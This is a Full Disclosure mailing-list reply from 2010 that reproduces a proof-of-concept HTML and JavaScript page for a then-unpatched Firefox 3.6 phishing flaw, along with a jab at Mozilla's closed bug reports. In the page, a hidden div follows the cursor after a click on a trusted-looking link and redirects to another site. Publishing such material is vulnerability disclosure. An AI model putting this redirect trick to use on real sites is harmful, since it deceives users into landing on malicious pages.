Full Disclosure mailing list archives
Re: Mozilla firefox 3.6 unpatched phishing vulnerability
From: Pradip Sharma <sharma.pradip () gmail com>
Date: Thu, 25 Feb 2010 20:26:51 +0530
On Thu, Feb 25, 2010 at 3:59 AM, <bugsbanned () hushmail com> wrote:
...Unpatched bug since Mozilla firefox 3.0...

Mozilla "INsecurity team" remember, security through obscurity just DOESN'T WORK... Locking down bugzilla advisories even the 2 years old ones is unnecessary and lame.

<html>
<body>
<div id="mydiv" onmouseover="document.location='http://Maliciouswebsite';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=mouseX-1;
  document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<br>
<a href="http://trustedwebsite" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://trusted website</font></a><br>
</div>
</body>
</html>

For example:

<html>
<body>
<div id="mydiv" onmouseover="document.location='http://www.wikipedia.org';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
  mouseX=evt.pageX?evt.pageX:evt.clientX;
  mouseY=evt.pageY?evt.pageY:evt.clientY;
  document.getElementById('mydiv').style.left=mouseX-1;
  document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
</div>
</body>
</html>

Source: www exploit-db com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mozilla firefox 3.6 unpatched phishing vulnerability bugsbanned (Feb 25)
- Re: Mozilla firefox 3.6 unpatched phishing vulnerability Pradip Sharma (Feb 25)
- Re: Mozilla firefox 3.6 unpatched phishing vulnerability Daniel Veditz (Feb 26)